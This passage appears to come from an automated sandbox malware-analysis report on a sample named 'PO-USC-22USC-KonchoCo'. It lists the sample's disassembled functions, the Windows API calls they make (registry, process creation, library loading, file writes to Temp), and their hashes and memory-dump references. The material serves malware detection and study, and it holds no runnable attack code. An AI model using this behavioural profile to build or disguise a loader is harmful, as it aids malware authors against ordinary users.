Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
Instruction ID: 56becb9136408d6600d44ef8ee1fb8662aacbb8094ba5771dc16c944e9e3e358
Opcode Fuzzy Hash: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
Instruction Fuzzy Hash: 39116D71900219EADF14DFA0DA589AE77B4BF04349F20447FE406B62C0D7B84A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004057DA Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004057EA

Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

OleUninitialize.OLE32(00000404,00000000), ref: 00405836

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
Instruction ID: 47b15979fd2771e4c3211fb1205fa32a21028b5b356e028cb2016eb217598776
Opcode Fuzzy Hash: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
Instruction Fuzzy Hash: 9EF09073A006009AEB116B54AE01B6B77A4FBD4705F05843AEE84632A1DB794C128B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C65 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00406A76 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
Part of subcall function 00406A06: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79

Uniqueness

Uniqueness Score: -1.00%

Function 00406172 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D52,?,?,00000000,00405F28,?,?,?,?), ref: 00406152
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406166

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: c2cf34f9040e51e437c363cb0e130cc408ba31f940be0e29863539f2f5e5855d
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: 34D0C976504220AFC2102728AE0889BBB55DB552717028A35F8A9A22B0CB314C6A8694

Uniqueness

Uniqueness Score: -1.00%

Function 00405C30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D

Uniqueness

Uniqueness Score: -1.00%

Function 00406224 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,004132DF,0040CEF0,0040357E,0040CEF0,004132DF,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9

Uniqueness

Uniqueness Score: -1.00%

Function 004061F5 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4

Uniqueness

Uniqueness Score: -1.00%

Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749

Uniqueness

Uniqueness Score: -1.00%

Function 004064EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040657D,?,?,?,?,: Completed,?,00000000), ref: 00406513

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040464D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
